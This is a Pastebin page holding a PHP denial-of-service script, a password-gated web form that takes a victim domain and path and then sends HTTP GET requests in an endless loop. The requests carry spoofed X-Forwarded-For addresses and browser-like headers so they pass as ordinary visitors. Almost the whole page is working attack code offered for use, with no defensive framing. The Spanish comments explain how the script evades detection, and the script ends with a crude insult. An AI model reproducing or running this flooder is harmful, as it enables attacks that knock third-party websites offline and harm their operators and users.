Bocah_cyber

PHP dDos Attack

Jul 22nd, 2012
236
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.     <?
  2.     /* -- By Punker2Bot -- */
  3.  
  4.     $dominio = $_POST['host'];
  5.     $ruta = $_POST['path'];
  6.     $port = $_POST['port'];
  7.     $poder = $_POST['poder'];
  8.     $pw = $_POST['pw'];?>
  9.     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  10.     <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
  11.     <head>
  12.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  13.     <meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
  14.     <meta name="author" content="Punker2Bot" />
  15.     <title>DDoser attacker Thuthuat247.com</title>
  16.     <style>
  17.     body { padding: 3px; }
  18.  
  19.     * {
  20.     background-color: #1F1F1F;
  21.     color: #0EEF57;
  22.     font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
  23.     font-size: 18px;
  24.     margin: 0; }
  25.  
  26.     input {
  27.     width: 440px;
  28.     border: solid 1px #00BCFF;
  29.     padding: 2px; }
  30.  
  31.     input.accion {
  32.     width: 215px;
  33.     border: solid 2px #00BCFF;
  34.     padding: 3px;
  35.     cursor: pointer }
  36.  
  37.     input:hover , input:active { border-color: #FFE900 }
  38.  
  39.     #dinamico {
  40.     padding: 3px;
  41.     font-size: 13px!important;
  42.     height: 300px;
  43.     min-height: 300px;
  44.     max-height: 300px;
  45.     overflow: hidden }
  46.     </style>
  47.     **********
  48.     function ir_a_bajo() {
  49.     var scc = document.getElementById('dinamico');
  50.     scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
  51.     }
  52.     setInterval('ir_a_bajo()',75);
  53.     </script>
  54.     </head>
  55.     <body id="index">
  56.     <form action="" method="post" name="jaja">
  57.     <table>
  58.     <tr>
  59.     <td class="titulo">
  60.     Dominio</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
  61.     </tr>
  62.     <tr>
  63.     <td class="titulo">
  64.     Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
  65.     </tr>
  66.     <tr>
  67.     <td class="titulo">
  68.     Puerto </td>
  69.     <td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
  70.     </tr>
  71.     <tr>
  72.     <td class="titulo">
  73.     Code </td>
  74.     <td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
  75.     </tr>
  76.     <tr>
  77.     <td class="titulo">
  78.     Preparado? </td> <td>
  79.     <input type="submit" value="DDosear now!" class="accion">   <input type="button" value="Dejar de atacar!" class="accion" /> </td>
  80.     </tr>
  81.     </table>
  82.     </form>
  83.     <br />
  84.     <div id="dinamico">
  85.     <?php
  86.     @set_time_limit(0);
  87.     $msj = array("<h2>No podes continuar, pw erroneo</h2></div></body></html>","<h2>Completa el form con los datos de la vicima!</h2></div></body></html>","<big><b>Error al atacar</b></big><br />\n","0a32e26a417d2c7cfbd333b7feb0a0a8","2e2234a41122a233cfbd333b9bc30a03");
  88.  
  89.     function ddoser($dominio,$ruta) {
  90.  
  91.     //hago un random de ips para no ser siempre el mismo vistitante
  92.     $ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
  93.  
  94.     //defino y abro socket segun los datos del form
  95.     $socket = fsockopen($dominio, "80", $errno, $errstr, 30);
  96.  
  97.     // comienzan los datos del header para parecer una persona comun xD
  98.     $header = "GET ".$ruta." HTTP/1.1\r\n";
  99.     $header .= "Host: ".$dominio."\r\n";
  100.     $header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\r\n";
  101.     $header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5\r\n";
  102.     $header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
  103.     $header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  104.     $header .= "Keep-Alive: 300\r\n";
  105.     $header .= "*****-Connection: keep-alive\r\n";
  106.     $header .= "Referer: http://".$dominio.$ruta."\r\n";
  107.     $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
  108.     $header .= "X-Forwarded-For: ".$ip_simulada."\r\n";
  109.     $header .= "Via: CB-Prx\r\n";
  110.     $header .= "Connection: Close\r\n\r\n";
  111.  
  112.     //envio todo lo recolectado
  113.     $send_header = fwrite($socket,$header);
  114.  
  115.     //lo muestro en la web
  116.     if($send_header) {
  117.     print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />\n");
  118.     } else {
  119.     print("$msj[2]");
  120.     }
  121.     fclose($socket);
  122.     }
  123.     if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
  124.     if($dominio !== "" && $dominio !== "www.victima.com") {
  125.     while(1) {
  126.     ddoser($dominio,$ruta);
  127.     }
  128.     } else { die ("$msj[1]");}
  129.     ?>
  130.     </div>
  131.     </body>
  132.     </html><? $el_saludo_es = "Chau gay, disfruta el script ;)" ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×